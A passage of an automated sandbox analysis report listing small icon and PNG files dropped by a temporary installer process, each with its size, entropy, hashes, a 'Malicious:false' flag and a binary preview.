                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.462526568231166
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:xDsK0GRS99Rss9RRgJw3Y8/atH9aVGS4pF8lY2GSVSSSSSaGR/X/f:lML9RYwottHQVGR8l9TVSSSSSaUvf
                                                                                                                                                                                                                                                          MD5:EA31E69B4C099C0090A088937CE958D6
                                                                                                                                                                                                                                                          SHA1:CC50F1927506BA8B94C17BFEBBA8D7B928C3A2E0
                                                                                                                                                                                                                                                          SHA-256:3F5FDBA100DD35B0BB4DBBC216A6D0E555C11E3C4907871A1B641BAFCEF6AC99
                                                                                                                                                                                                                                                          SHA-512:B3A62801B292D27F8614E8612399A13A1B66C15EE8ED7781A4DE87C05CE8530255A8F4BA993775810D8E4E1DA2647E58B57C3026BB0718294AA6E4C515E888D2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................D...C...A...A...A...@...@...@...@...@...@...A...A...A...C...D...E../r...e...c...b...`...^...`...`...^..._...a...c...e../r...E...G...k...V...U...T...M...J...K...L...J...L...R...U...V...k...G...I...m...Y...Y...X..........@{...`...........m...Y...Y...m...I...K...q..._..._...^...e..................$r...]..._..._...q...K...M...v...c...c...a...Z...d..........9z...X...^...b...c...v...M...N..!{...g...g...d..s.......................(w...e...g..!{...N...R..$....l...m...k..........R...P...w............l...l..$....R...S..'....q...r...p..#z..`...........z...&{...{...r...q..'....S...U..,....v...v...r..Y........................q...t...v..,....U...W..1....z...z...w...........r...r..........?....y...z..1....W...Y..6....}...}...{...........p...m..........E....}...}..6....Y...[..;...............l.......................%...........;....[...^..A...#..."...#...$...y...............,...#..."...#...A....^...`..[...G...D...E...F...F...F...F...F...F.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.78558880583897
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:KfbXxEm8sLBtLt08SHKdvaB8a+jzSCt/lgj5XTc64b6fNSuHwPqD7H:KfbhX8sL90rHKNaB8ayRYdjc64OpVb
                                                                                                                                                                                                                                                          MD5:BD477227A18FED51A2C527EA4E32400B
                                                                                                                                                                                                                                                          SHA1:6FC1F173245E77BDA386CE112D9A19502E5C0A92
                                                                                                                                                                                                                                                          SHA-256:6569A42B81E6B02E8385CDF5EED48A3FBF3CB89101142723FAAEECDC9785D203
                                                                                                                                                                                                                                                          SHA-512:20DC45444E3D2FF3C5C427C60A5B1C7941FFE74E79B9C156E033D53DCBB616AA2A0518AFC2CCFD7FAC4D95581AC2606DF81B7BACA7EA28AD875871949DD8229B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ......................................................................................................fA..hB..kD..mE..oG..sI..tK..rI..lE..iC......................b?..................................fA.............._<.....d?..fA..hB..jC..e<.............d..d=.....b?..........]<.....c?..d@..fA..hB..b;.............c..b<.....a>..........[;.....a=..b>..d@..e@..`9.............a.._:.....`=..........Z:....._<..`=..b>..c?..Y4.............{\..Y5.....]<..........X9.....\;..]<.._<..a=..nN.............v..pQ.....[:..........V7.....X8..Y8..Y8..[:.............................W7..........S5.....eE..mL..sQ..wU.............................T5..........{[.....f..g..g..g..}Y................wS.....|\..........j.....i..i..i..j..e........................i..........o.....o..o..o..o..o..k.....................n..............u.........................v......................{..{..{..{..{..{..{..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):781
                                                                                                                                                                                                                                                          Entropy (8bit):7.651387048168162
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:tfp9eW5Oon3iu7MTGS7ZN6tv1lyvv60hrTcdrU:j9eW5VSOwn4lwi0tGU
                                                                                                                                                                                                                                                          MD5:4121D02B972D718C30E8B41023B894EE
                                                                                                                                                                                                                                                          SHA1:751D347690F151AEAC02DD8C69A1F3D629D1DDD0
                                                                                                                                                                                                                                                          SHA-256:807241CF72D7A2CC7DA63ADE8E22F6D1976E9B5D4B9CEC8479960EF4CE0CAD24
                                                                                                                                                                                                                                                          SHA-512:FCDF69080406D542FA6A460C741BD53B4BC052D26EF930F61381CD05B73DCC1D8F13AE71A786E0C795BBE6889ED044D2CF9427CCC3E29CBF3BB7C97188E31BF0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..MH.a.....[..'...m&......h...C...!.....T...%.(l........6...!Z7E.v%.e.u.gfwvg..P../<..........$.8.". ..W..#]..D.L...q..2"N.!.."ar.9V+.....>..++......Y{..Hk.5.av-./.C..x._..1....,...n7.... ......U..>-Ru....t=.-o...p...W...9z.......\...>....V...,P-..Icr"F,..s1l3<....PU.......J......h@../..R.Y}2........f..R`.....=.a.s.F..y.8e.......[.?..<.....JK.."..p...Y...!..H....L.A0.D.....sU.*.NQGS..(.xF....._y..S.p2N..w....p,.......=.T.^G....p.$.=w.b..4.~. ...FY5q...!z..N....*7EG.r.Og.(.o..8...*.\..6."J......huh../sT..2%2$?.Y.".....b.y.x?.....=@..w..m.p..T..#..+@M.{...=j|..-E.x.>@.....h...2.H.?.O......t..a.6.......k..n.5.L..3...8~^..%......G.....*!......)..fCMMMWjjj.2aL...c.y....&G.......VA.:..I..........!......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.138741072579881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:+qqGcDzDzzrspvYD/teTclAZOPUzydT4l7Rx6IRzav29P9B66k:a/DzDPrsK/tegAZOPAku7H5zav2d9B6Z
                                                                                                                                                                                                                                                          MD5:4BF5323641C8B9F667BE8A2530CB17C4
                                                                                                                                                                                                                                                          SHA1:8824036ED659C4D0A23376329B397BB01632B9DB
                                                                                                                                                                                                                                                          SHA-256:533DAA8DE562BB129564B41E2BBD734D74178E4CBB02B060A780A6C5DAE9D6B6
                                                                                                                                                                                                                                                          SHA-512:E63C20BF94A9DE5D6344E56A3D6934B32D65D13201BA3326E70F1DC0AFA9475ED2BFA44EB829498AB80265DC1B3B5ADB0BE866F50F685276E5B1FD0E0AFF73FA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................q...y...x...x...x...x...w...x...x...x...w...x...x...x...x...r...|...s...s...s...s...s...s...r...s...t...s...s...s...s...s...{...~...v...v...w...w...v...v...v...u...u...v...v...v...w...v...|.......z....P..........z.............z...z............P..z...........}....X..........}.............}...}............W..}............!..^..........."............."...!..........]...!...........'..e...........'.............'...'..........d...'......."...-..k...........,.............-...J..........h...,...!...%...2..q...........2..............................K...3...%...)...7..w...........8...........................6...8...*.......=...7...)...)...>...0...*...0...7...@...=...9...>...=.......2...C..[...........B...C...C...D...C...D...C...C...C...C...3...8...I..p...........I...I...J...I...J...J...J...I...J...J...6...;...O...L..`...R...O...N...N...N...O...O...O...O...N...O...:...=..U...T..U..U...T...T..U..U..T...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):699
                                                                                                                                                                                                                                                          Entropy (8bit):7.652754071132357
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7WaWgISPVxzQYiM4U3qwAwJms1184FTquLwsObH6yk2CrJ61:rnuzKMf3pXmg/FDoZkd61
                                                                                                                                                                                                                                                          MD5:6A1DE861212D48E1899DF21E458C1542
                                                                                                                                                                                                                                                          SHA1:02A81BF8ADE97DAC769CD1DBA84A207431E077CF
                                                                                                                                                                                                                                                          SHA-256:052EE2A81A293DC611CE88300798DBA2B2E7B0CD924C099CB9B6B8C3D4B354D1
                                                                                                                                                                                                                                                          SHA-512:6EEC1E50166CBCB04C7A53AC7A94CC0133788FABC4E2B781F076B69DF3B906BDC07A4CB99CBF02F2E0B5F273DD3152DBDF2405BA78EDFD694034B7CA9545B458
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.e.Kh.Q...;.I&.T..M.v..q.(.}(b[......"...V.Rm.......BD..ji...m......TteC...M2y\.....y....g.a..'..+.~.10.q.._0._.Yy..m>.d-.(.V..d`".6........u.w..).....|...$3Y.,;...%..H'.....iXWS.k.7!.....S"......ds.g..q`.{*Tx....l..D.]/..AV..[....5\...T......r.Kh#W..B...pi...\.CS...2..W^.*.a..:...(.;B..t4....J*..W+|.oc.7..B.%.........(.L...FDh.f.......EM.....8........+I.....C...n...._.?..../.....~t...q..6.....E.b..j...7#8M......p1.^.G.u.k.._.=E.cu.a.S7...E..[Q..h&.....E?.'0\..@....a.0."..M....m..c..........8.&.s.1.h .R.;.6..}w"8A.&......J..........`840w.#..3..X.V:y.>[.Y......J.3o..2Yn.5.esHC...;~.@.5.....K{.;`A.......".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.7202656984010085
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:JdJzibJG6NppClipAcGrwX6QG6tIR/8hINNIyJwy1I2Mleeyy7qVT:JdJz+BalipGZP6tIMINNIcV1I2Ml2y7a
                                                                                                                                                                                                                                                          MD5:EBFC3AD0B132D550ADC92A0F42776D1F
                                                                                                                                                                                                                                                          SHA1:335FFD8C4685F556F837F6E8D94D7058F4636023
                                                                                                                                                                                                                                                          SHA-256:1F00E5AE25225136ED95AD24D70C691C4367843E52A3E6D961F4E2009DFEA934
                                                                                                                                                                                                                                                          SHA-512:A834FD7402F572AB7D27A0547C4363A02C94DCD87E733AB7DA0CC1B25437657F8876F540EC06C544AFB6490449B6611311EE82C8F6E333771D7A00CD391D523D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................D.?.C..B...@...?...>...=...;...:...9...8...8...8...8...8..8./.F..Q...])..d/..b/..f1.........................._,..N...B...8..G..._+..g1..e0..d/..g2..........................a...V'..M...8...H...i3..h2..f1..e0..h2..........................b...W'..V&..8...I...k4..i3..h2..f1..h2..........................c/..Y(..W'..8...K...k4..j4..i3..g2..i3........................b...Z)..X(..8...L...l5..k4..j4..i3..g2..s@..............q?..^,..[*..Z)..9...M...l5..l5..k4..j3..h2..g2..i3..l5..l5..g2.._-..^,..\+..[*..:...N...l5..l5..l5..k4..j3..j3..t..........t..f1.._,..^,..\+..;...P...}M..U..Y..b..^..P..................~O..j:..e5..a0..=...Q...l..i..e..b..^..g..................g..n>..j;..f6..>...R...l..i..e..b..^..P..................~O..p@..k;..h7..?...T...l..i..e..b..^..}M..Z.........Z..q?..qA..m<..g5..@...U...X..i..e..b..^..[..~O..wD..uB..wE..vF..sB..n=..a/..B...V...m:..V..S..~P..{M..yJ..wG..uE..rA..o
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):706
                                                                                                                                                                                                                                                          Entropy (8bit):7.638733880632528
                                                                                                                                                                                                                                                          Encrypted:false
